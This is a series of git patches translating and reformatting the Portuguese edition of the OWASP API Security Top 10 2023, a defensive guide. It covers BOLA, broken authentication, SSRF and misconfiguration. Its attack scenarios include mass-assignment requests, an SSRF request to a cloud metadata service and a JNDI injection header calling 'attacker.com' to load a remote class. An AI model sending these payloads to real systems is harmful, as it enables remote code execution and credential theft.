@@ -47,20 +47,20 @@ online. ### Cenário #2 Um fabricante de automóveis habilitou o controlo remoto dos seus veículos -através de uma API para comunicação com o telemóvel do condutor. A API -permite ao condutor iniciar e parar o motor e trancar e destrancar as portas +através de uma API para comunicação com o telemóvel do condutor. A API permite +ao condutor iniciar e parar o motor e trancar e destrancar as portas remotamente. Como parte deste processo, o utilizador envia o Número de -Identificação do Veículo (VIN) para a API. -No entanto, a API não valida se o VIN representa um veículo que pertence ao -utilizador autenticado, o que resulta numa vulnerabilidade de BOLA. Um atacante -pode aceder a veículos que não lhe pertencem. +Identificação do Veículo (VIN) para a API. No entanto, a API não valida se o VIN +representa um veículo que pertence ao utilizador autenticado, o que resulta numa +vulnerabilidade de BOLA. Um atacante pode aceder a veículos que não lhe +pertencem. ### Cenário #3 Um serviço de armazenamento de documentos online permite aos utilizadores -visualizar, editar, armazenar e eliminar os seus documentos. Quando um -documento de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID -do documento para a API. +visualizar, editar, armazenar e eliminar os seus documentos. Quando um documento +de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID do +documento para a API. ``` POST /graphql diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index b8359f20e..3c57c44f8 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md 
@@ -7,9 +7,9 @@ ## A API é vulnerável? -Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. -Além disso, mecanismos de recuperação de _password_ devem ser tratados da mesma -forma que os mecanismos de autenticação. +Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. Além +disso, mecanismos de recuperação de _password_ devem ser tratados da mesma forma +que os mecanismos de autenticação. Uma API é vulnerável se: @@ -20,8 +20,8 @@ Uma API é vulnerável se: excesso de tentativas de autenticação falhadas. * Permite a utilização de _passwords_ fracas. * Envia informação de autenticação, tal como _tokens_ e _passwords_, no URL. -* Permite que os utilizadores alterem o seu endereço de email, _password_ atual ou - realizem outras operações sensíveis sem pedir a confirmação da _password_. +* Permite que os utilizadores alterem o seu endereço de email, _password_ atual + ou realizem outras operações sensíveis sem pedir a confirmação da _password_. * Não valida a autenticidade dos _tokens_ de autenticação. * Aceita _tokens_ JWT sem que estes sejam assinados/usando algoritmos fracos `("alg":"none")` @@ -38,8 +38,8 @@ Além disso, um microsserviço é vulnerável se: ## Cenário #1 -Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido -de API como o exemplo abaixo, com as credenciais do utilizador: +Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido de +API como o exemplo abaixo, com as credenciais do utilizador: ``` POST /graphql 
@@ -52,9 +52,9 @@ POST /graphql } ``` -Se as credenciais forem válidas, é devolvido um token de autenticação que -deve ser fornecido em pedidos subsequentes para identificar o utilizador. -A quantidade de tentativas de login está sujeita a uma limitação temporal +Se as credenciais forem válidas, é devolvido um token de autenticação que deve +ser fornecido em pedidos subsequentes para identificar o utilizador. A +quantidade de tentativas de login está sujeita a uma limitação temporal restritiva: apenas três pedidos são permitidos por minuto. Para efetuar login por força bruta com a conta de uma vítima, os atores @@ -85,10 +85,10 @@ Authorization: Bearer ``` Devido à API não exigir que os utilizadores confirmem a sua identidade -fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se numa -posição de roubar o token de autenticação podem conseguir assumir a conta da -vítima ao iniciar o processo de redefinição de senha após atualizar o endereço -de email da conta da vítima. +fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se +numa posição de roubar o token de autenticação podem conseguir assumir a conta +da vítima ao iniciar o processo de redefinição de senha após atualizar o +endereço de email da conta da vítima. ## Como Prevenir diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index b82db1bdb..e6573388a 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md 
@@ -7,9 +7,9 @@ ## A API é vulnerável? -Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da -API, é importante validar que o utilizador tem acesso às propriedades -específicas do objeto que está a tentar aceder. +Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da API, +é importante validar que o utilizador tem acesso às propriedades específicas do +objeto que está a tentar aceder. Um _endpoint_ de uma API é vulnerável se: @@ -50,17 +50,17 @@ POST /graphql } ``` -O endpoint da API é vulnerável porque permite que o utilizador autenticado -tenha acesso a propriedades sensíveis do utilizador denunciado, como -"fullName" (nome completo) e "recentLocation" (localização recente), que não -deveriam estar accessíveis a outros utilizadores. +O endpoint da API é vulnerável porque permite que o utilizador autenticado tenha +acesso a propriedades sensíveis do utilizador denunciado, como "fullName" (nome +completo) e "recentLocation" (localização recente), que não deveriam estar +acessíveis a outros utilizadores. ### Cenário #2 Uma plataforma de mercado online, que permite a um tipo de utilizadores ('anfitriões') alugar o seu apartamento a outro tipo de utilizadores -('hóspedes'), requer que o anfitrião aceite uma reserva feita por um -hóspede antes de cobrar ao hóspede pela estadia. +('hóspedes'), requer que o anfitrião aceite uma reserva feita por um hóspede +antes de cobrar ao hóspede pela estadia. Como parte deste processo, é feito um pedido de API pelo anfitrião para `POST /api/host/approve_booking` com o seguinte conteúdo legítimo: 
@@ -88,10 +88,9 @@ hóspede vai ser cobrado mais do que deveria. ### Cenário #3 -Uma rede social baseada em vídeos curtos, impõe filtros restritivos de -conteúdo e censura. Mesmo que um vídeo carregado seja bloqueado, o -utilizador pode alterar a descrição do vídeo utilizando o seguinte pedido à -API: +Uma rede social baseada em vídeos curtos, impõe filtros restritivos de conteúdo +e censura. Mesmo que um vídeo carregado seja bloqueado, o utilizador pode +alterar a descrição do vídeo utilizando o seguinte pedido à API: ``` PUT /api/video/update_video @@ -101,8 +100,8 @@ PUT /api/video/update_video } ``` -Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o -seguinte conteúdo malicioso: +Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o seguinte +conteúdo malicioso: ``` { @@ -111,15 +110,15 @@ seguinte conteúdo malicioso: } ``` -O _endpoint_ da API é vulnerável porque não há validação se o utilizador -deve ter acesso à propriedade interna do objeto - `blocked`, e o utilizador -pode alterar o valor de `true` para `false` e desbloquear o seu próprio -conteúdo bloqueado. +O _endpoint_ da API é vulnerável porque não há validação se o utilizador deve +ter acesso à propriedade interna do objeto - `blocked`, e o utilizador pode +alterar o valor de `true` para `false` e desbloquear o seu próprio conteúdo +bloqueado. ## Como Prevenir -* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre - de que o utilizador deve ter acesso às propriedades do objeto que expõe. +* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre de + que o utilizador deve ter acesso às propriedades do objeto que expõe. * Evite usar métodos genéricos como `to_json()` e `to_string()`. Em vez disso, selecione especificamente as propriedades do objeto que deseja retornar. * Se possível, evite usar funções que automaticamente vinculem os dados 
@@ -127,11 +126,11 @@ conteúdo bloqueado. propriedades de objetos ("Mass Assignment"). * Permita alterações apenas nas propriedades do objeto que devam ser atualizadas pelo cliente. -* Implemente um mecanismo de validação de resposta baseado num esquema como - uma camada extra de segurança. Como parte deste mecanismo, defina e imponha - que dados são retornados por todos os métodos da API. -* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo - com os requisitos comerciais/funcionais para o _endpoint_. +* Implemente um mecanismo de validação de resposta baseado num esquema como uma + camada extra de segurança. Como parte deste mecanismo, defina e imponha que + dados são retornados por todos os métodos da API. +* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo com + os requisitos comerciais/funcionais para o _endpoint_. ## Referências diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index b1cbaa202..1d9f4e933 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -31,11 +31,11 @@ definido inadequadamente (e.g. muito baixo/alto): ### Cenário #1 Uma rede social implementou um mecanismo de "recuperar senha" através da -verificação por SMS, permitindo que o utilizador receba um _token_ de uso -único via SMS para redefinir a sua senha. +verificação por SMS, permitindo que o utilizador receba um _token_ de uso único +via SMS para redefinir a sua senha. -Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API -a partir do navegador do utilizador para a API de _back-end_: +Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API a +partir do navegador do utilizador para a API de _back-end_: ``` POST /initiate_forgot_password 
@@ -68,7 +68,8 @@ em questão de minutos. ### Cenário #2 -Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de perfil. +Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de +perfil. ``` POST /graphql @@ -114,9 +115,9 @@ serviço (_Denial of Service_). Um prestador de serviços permite que os clientes descarreguem ficheiros arbitrariamente grandes através da sua API. Estes ficheiros são mantidos em armazenamento de objetos na nuvem e não mudam com frequência. O prestador de -serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço e -manter o consumo de largura de banda baixo. O serviço de _cache_ apenas armazena -ficheiros até 15GB. +serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço +e manter o consumo de largura de banda baixo. O serviço de _cache_ apenas +armazena ficheiros até 15GB. Quando um dos ficheiros é atualizado, o seu tamanho aumenta para 18GB. Todos os clientes do serviço começam imediatamente a descarregar a nova versão. Como não 
@@ -130,28 +131,22 @@ dólares. [número de reinícios][3], [descritores de ficheiros e processos][4], como Containers / Código Serverless (e.g. Lambdas). * Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos - de entrada, como comprimento máximo para _strings_, número máximo de elementos - em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de - ser armazenado localmente ou na nuvem). -* Implemente um limite de frequência com que um cliente pode interagir com a - API dentro de um período temporal definido (_rate limiting_). + de entrada, como comprimento máximo para _strings_, número máximo de + elementos em arrays e tamanho máximo de ficheiro para _upload_ + (independentemente de ser armazenado localmente ou na nuvem). +* Implemente um limite de frequência com que um cliente pode interagir com a API + dentro de um período temporal definido (_rate limiting_). * A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. Alguns endpoints da API podem exigir políticas mais rigorosas. -* Limite/controle quantas vezes ou com que frequência um único cliente/utilizador - da API pode executar uma única operação (e.g. validar um OTP ou solicitar - a recuperação de senha sem visitar o URL de uso único). -* Add proper server-side validation for query string and request body - parameters, specifically the one that controls the number of records to be - returned in the response. -* Adicione validação adequada no lado do servidor para parâmetros da _query string_ - e do corpo do pedido, especificamente aqueles que controlam o número de resultados - a serem retornados na resposta. -* Configure spending limits for all service providers/API integrations. When - setting spending limits is not possible, billing alerts should be configured - instead. -* Configure limites de gastos para todos os fornecedores de serviços/integracões de - API. 
Quando não for possível definir limites de gastos, devem ser configurados - alertas de faturamento. +* Limite/controle quantas vezes ou com que frequência um único + cliente/utilizador da API pode executar uma única operação (e.g. validar um + OTP ou solicitar a recuperação de senha sem visitar o URL de uso único). +* Adicione validação adequada no lado do servidor para parâmetros da + _query string_ e do corpo do pedido, especificamente aqueles que controlam o + número de resultados a serem retornados na resposta. +* Configure limites de gastos para todos os fornecedores de serviços/integrações + de API. Quando não for possível definir limites de gastos, devem ser + configurados alertas de faturamento. ## Referências diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 234e010a1..91039d83f 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -42,7 +42,8 @@ Um atacante duplica o pedido e manipula o método HTTP e o _endpoint_ para administradores através da consola de administração. O _endpoint_ não implementa verificações de autorização de acesso à função. -O atacante explora a falha e envia um novo convite com privilégios de administrador: +O atacante explora a falha e envia um novo convite com privilégios de +administrador: ``` POST /api/invites/new 
@@ -58,13 +59,6 @@ de administrador e obter acesso total ao sistema. ### Cenário #2 -An API contains an endpoint that should be exposed only to administrators - -`GET /api/admin/v1/users/all`. This endpoint returns the details of all the -users of the application and does not implement function level authorization -checks. An attacker who learned the API structure takes an educated guess and -manages to access this endpoint, which exposes sensitive details of the users -of the application. - Uma API contém um _endpoint_ que deveria ser exposto apenas a administradores - `GET /api/admin/v1/users/all`. Este _endpoint_ retorna os detalhes de todos os utilizadores da aplicação e não implementa verificações de autorização de acesso diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index ef321c8bb..e419ed906 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md 
@@ -15,26 +15,28 @@ Exemplos comuns de fluxos de negócios sensíveis e o risco de acesso excessivo associado a eles: * Fluxo de compra de um produto - um atacante pode comprar todo o stock de um - item de alta procura de uma só vez e revendê-lo por um preço mais alto (scalping). -* Fluxo de criação de comentário/publicação - um atacante pode inundar o sistema com spam. -* Realização de uma reserva - um atacante pode reservar todos os horários disponíveis - e impedir que outros utilizadores utilizem o sistema. + item de alta procura de uma só vez e revendê-lo por um preço mais alto + (scalping). +* Fluxo de criação de comentário/publicação - um atacante pode inundar o sistema + com spam. +* Realização de uma reserva - um atacante pode reservar todos os horários +* disponíveis e impedir que outros utilizadores utilizem o sistema. -O risco de acesso excessivo pode variar entre indústrias e empresas. Por exemplo, a -criação de publicações através de um script pode ser considerada um risco de spam por -uma rede social, mas incentivada por outra rede social. +O risco de acesso excessivo pode variar entre indústrias e empresas. Por +exemplo, a criação de publicações através de um script pode ser considerada um +risco de spam por uma rede social, mas incentivada por outra rede social. -Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem restringir -adequadamente o acesso a ele. +Um endpoint de API está vulnerável se expõe um fluxo de negócio sensível sem +restringir adequadamente o acesso a ele. ## Exemplos de Cenários de Ataque ### Cenário #1 -Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no Dia -de Ação de Graças. O produto tem uma procura muito alta e o stock é limitado. Um -atacante escreve código para comprar automaticamente o novo produto e concluir a -transação. +Uma empresa de tecnologia anuncia que vai lançar uma nova consola de jogos no +Dia de Ação de Graças. 
O produto tem uma procura muito alta e o stock é +limitado. Um atacante escreve código para comprar automaticamente o novo produto +e concluir a transação. No dia do lançamento, o atacante executa o código distribuído por diferentes endereços IP e localizações. A API não implementa a proteção adequada e permite @@ -46,15 +48,16 @@ alto. ### Cenário #2 -Uma companhia aérea oferece a compra de bilhetes online sem taxa de cancelamento. -Um utilizador com intenções maliciosas reserva 90% dos assentos de um voo desejado. +Uma companhia aérea oferece a compra de bilhetes online sem taxa de +cancelamento. Um utilizador com intenções maliciosas reserva 90% dos assentos de +um voo desejado. -Alguns dias antes do voo, o utilizador malicioso cancelou todos os bilhetes de uma -vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para preencher -o voo. +Alguns dias antes do voo, o utilizador malicioso cancelou todos os bilhetes de +uma vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para +preencher o voo. -Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato do -que o original. +Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato +do que o original. ### Cenário #3 
@@ -85,9 +88,9 @@ O planeamento da mitigação deve ser feito em duas camadas: * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes usem soluções mais sofisticadas, tornando-as mais caras para eles. - * Detecção humana: utilize _captcha_ ou soluções biométricas mais avançadas + * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas (e.g. padrões de digitação). - * Padrões não humanos: analisar o fluxo do utilizador para detectar padrões + * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e "finalizar compra" em menos de um segundo). * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index 7e36e4a0e..f71d63a25 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md 
@@ -3,28 +3,28 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | -| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detetar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. 
| A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | ## A API é vulnerável? Falhas de Server-Side Request Forgery (SSRF) ocorrem quando uma API pede um -recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que -um atacante force a aplicação a enviar um pedido manipulado para um destino +recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que um +atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por uma firewall ou uma VPN. -Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais -comum e mais perigoso. +Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais comum +e mais perigoso. -Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder -a recursos externos com base em entradas de utilizadores: Webhooks, download -de ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. +Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder a +recursos externos com base em entradas de utilizadores: Webhooks, download de +ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. Mais perigoso - Tecnologias modernas como provedores de nuvem, Kubernetes e -Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis -e bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. +Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis e +bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. -Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido -à natureza conectada das aplicações modernas. 
+Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido à +natureza conectada das aplicações modernas. O risco de SSRF nem sempre pode ser completamente eliminado. Ao escolher um mecanismo de proteção, é importante considerar os riscos e necessidades do @@ -36,8 +36,8 @@ negócio. Uma rede social permite que os utilizadores façam o upload de fotos de perfil. O utilizador pode escolher entre carregar o ficheiro de imagem do seu -dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar -a seguinte chamada API: +dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar a +seguinte chamada API: ``` POST /api/profile/upload_picture From 61a88924c228efe77e8e241adc562e0e5587c369 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sat, 26 Oct 2024 09:42:35 +0100 Subject: [PATCH 45/64] Update 0xa7-server-side-request-forgery.md --- .../pt-pt/0xa7-server-side-request-forgery.md | 57 ++++++++++--------- 1 file changed, 29 insertions(+), 28 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index f71d63a25..c40de1574 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -47,8 +47,8 @@ POST /api/profile/upload_picture } ``` -An attacker can send a malicious URL and initiate port scanning within the -internal network using the API Endpoint. +Um atacante pode enviar um URL malicioso e iniciar um _scan_ de portas +dentro da rede interna usando o _endpoint_ da API. ``` { 
@@ -56,18 +56,19 @@ internal network using the API Endpoint. } ``` -Based on the response time, the attacker can figure out whether the port is -open or not. +Com base no tempo de resposta, o atacante pode descobrir se a porta está +aberta ou não. ### Cenário #2 -A security product generates events when it detects anomalies in the network. -Some teams prefer to review the events in a broader, more generic monitoring -system, such as a SIEM (Security Information and Event Management). For this -purpose, the product provides integration with other systems using webhooks. +Um produto de segurança gera eventos quando detecta anomalias na rede. +Algumas equipas preferem rever os eventos num sistema de monitorização mais +amplo e genérico, como um SIEM (Gestão de Informações e Eventos de Segurança). +Para este fim, o produto fornece integração com outros sistemas usando +_webhooks_. -As part of a creation of a new webhook, a GraphQL mutation is sent with the URL -of the SIEM API. +Como parte da criação de um novo _webhook_, uma mutação GraphQL é enviada com o +URL da API do SIEM. ``` POST /graphql @@ -95,11 +96,11 @@ POST /graphql ``` -During the creation process, the API back-end sends a test request to the -provided webhook URL, and presents to the user the response. +Durante o processo de criação, o _back-end_ da API envia um pedido de teste para o +URL do webhook fornecido e apresenta a resposta ao utilizador. -An attacker can leverage this flow, and make the API request a sensitive -resource, such as an internal cloud metadata service that exposes credentials: +Um atacante pode explorar este fluxo e fazer com que a API solicite um recurso +sensível, como um serviço de metadados de nuvem interna que expõe credenciais: ``` POST /graphql 
@@ -126,23 +127,23 @@ POST /graphql ] ``` -Since the application shows the response from the test request, the attacker -can view the credentials of the cloud environment. +Uma vez que a aplicação mostra a resposta do pedido de teste, o atacante pode +visualizar as credenciais do ambiente de nuvem. ## Como Prevenir -* Isolate the resource fetching mechanism in your network: usually these - features are aimed to retrieve remote resources and not internal ones. -* Whenever possible, use allow lists of: - * Remote origins users are expected to download resources from (e.g. Google - Drive, Gravatar, etc.) - * URL schemes and ports - * Accepted media types for a given functionality -* Disable HTTP redirections. -* Use a well-tested and maintained URL parser to avoid issues caused by URL - parsing inconsistencies. -* Validate and sanitize all client-supplied input data. -* Do not send raw responses to clients. +* Isole o mecanismo de obtenção de recursos na sua rede: geralmente, essas + funcionalidades são destinadas a recuperar recursos remotos e não internos. +* Sempre que possível, utilize listas de permissões de: + * Origens remotas das quais se espera que os utilizadores façam download de + recursos (por exemplo, Google Drive, Gravatar, etc.) + * Esquemas de URL e portas + * Tipos de media aceites para uma determinada funcionalidade +* Desative redirecionamentos HTTP. +* Utilize um URL _parser_ bem testado e mantido para evitar problemas causados +por inconsistências no processamento de URLs. +* Valide e sanitize todos os dados de entrada fornecidos pelo cliente. +* Não envie respostas não tratadas aos clientes. ## Referências From 943f697b679f1bced6e9da9984fa3870128d8583 Mon Sep 17 00:00:00 2001 
From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 27 Oct 2024 16:12:40 +0000
Subject: [PATCH 46/64] Update 0xa8-security-misconfiguration.md
---
 .../pt-pt/0xa8-security-misconfiguration.md | 79 ++++++++++---------
 1 file changed, 42 insertions(+), 37 deletions(-)
diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md
index c2dd4b98a..0fc0dece4 100644
--- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md
+++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md
@@ -1,50 +1,55 @@ # API8:2023 Security Misconfiguration -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | -| Attackers will often attempt to find unpatched flaws, common endpoints, services running with insecure default configurations, or unprotected files and directories to gain unauthorized access or knowledge of the system. Most of this is public knowledge and exploits may be available. | Security misconfiguration can happen at any level of the API stack, from the network level to the application level. Automated tools are available to detect and exploit misconfigurations such as unnecessary services or legacy options. | Security misconfigurations not only expose sensitive user data, but also system details that can lead to full server compromise. | - -## Is the API Vulnerable? - -The API might be vulnerable if: - -* Appropriate security hardening is missing across any part of the API stack, - or if there are improperly configured permissions on cloud services -* The latest security patches are missing, or the systems are out of date -* Unnecessary features are enabled (e.g. 
HTTP verbs, logging features) -* There are discrepancies in the way incoming requests are processed by servers - in the HTTP server chain -* Transport Layer Security (TLS) is missing -* Security or cache control directives are not sent to clients -* A Cross-Origin Resource Sharing (CORS) policy is missing or improperly set -* Error messages include stack traces, or expose other sensitive information - -## Example Attack Scenarios - -### Scenario #1 - -An API back-end server maintains an access log written by a popular third-party -open-source logging utility with support for placeholder expansion and JNDI -(Java Naming and Directory Interface) lookups, both enabled by default. For -each request, a new entry is written to the log file with the following -pattern: ` / - `. - -A bad actor issues the following API request, which gets written to the access -log file: +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Detectability **Fácil** | Técnico **Severo** : Específico do Negócio | +| Os atacantes frequentemente tentam encontrar falhas não corrigidas, _endpoints_ comuns, serviços a funcionar com configurações padrão inseguras ou arquivos e diretórios não protegidos para obter acesso não autorizado ou conhecimento do sistema. A maior parte disto é conhecimento público e os _exploits_ podem estar disponíveis. | A má configuração de segurança pode ocorrer em qualquer nível da API, desde o nível da rede até o nível da aplicação. Ferramentas automatizadas estão disponíveis para detectar e explorar más configurações, como serviços desnecessários ou opções antigas. | As más configurações de segurança não expõem apenas dados sensíveis dos utilizadores, mas também detalhes do sistema que podem levar a um compromisso total do servidor. | + +## A API é vulnerável? + +A API pode ser vulnerável se: + +* As devidas proteções de segurança não foram aplicadas em qualquer parte da + API, ou se houver permissões mal configuradas em serviços de nuvem. 
+* Os últimos _patches_ de segurança estão em falta ou os sistemas estão + desatualizados. +* Funcionalidades desnecessárias estão ativadas (por exemplo, verbos HTTP, + funcionalidades de registo de eventos). +* Existem discrepâncias na forma como os pedidos são processados pelos + servidores na cadeia de servidores HTTP. +* A Segurança da Camada de Transporte (TLS) está em falta. +* Diretivas de segurança ou de controlo de cache não são enviadas aos clientes. +* Uma política de Partilha de Recursos entre Origens (CORS) está em falta ou mal + configurada. +* As mensagens de erro incluem _stack traces_ ou expõem outras informações + sensíveis. + +## Exemplos de Cenários de Ataque + +### Cenário #1 + +Um servidor de API _back-end_ mantém um registo de acesso escrito por uma +utilidade de registo _open-source_ popular de terceiros, com suporte para +expansão de espaços reservados e pesquisas JNDI (Java Naming and Directory +Interface), ambos ativados por defeito. Para cada pedido, uma nova entrada é +escrita no ficheiro de registo com o seguinte padrão: +` / - `. + +Um ator malicioso emite o seguinte pedido de API, que é escrito no ficheiro de +registo de acesso: ``` GET /health X-Api-Version: ${jndi:ldap://attacker.com/Malicious.class} ``` -Due to the insecure default configuration of the logging utility and a -permissive network outbound policy, in order to write the corresponding entry -to the access log, while expanding the value in the `X-Api-Version` request -header, the logging utility will pull and execute the `Malicious.class` object -from the attacker's remote controlled server. +Devido à configuração padrão insegura da utilidade de registo e a uma política +de rede de saída permissiva, para escrever a entrada correspondente no registo +de acesso, ao expandir o valor no cabeçalho `X-Api-Version` do pedido, a +utilidade de registo irá buscar e executar o objeto `Malicious.class` do +servidor controlado remotamente pelo atacante. 
-### Scenario #2 +### Cenário #2 A social network website offers a "Direct Message" feature that allows users to keep private conversations. To retrieve new messages for a specific From 19d51dcd44115f38a6bd32d08987596061dcb1d1 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 31 Oct 2024 13:38:11 +0000 Subject: [PATCH 47/64] Update 0xa8-security-misconfiguration.md --- .../pt-pt/0xa8-security-misconfiguration.md | 91 ++++++++++--------- 1 file changed, 48 insertions(+), 43 deletions(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 0fc0dece4..122220c6f 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md 
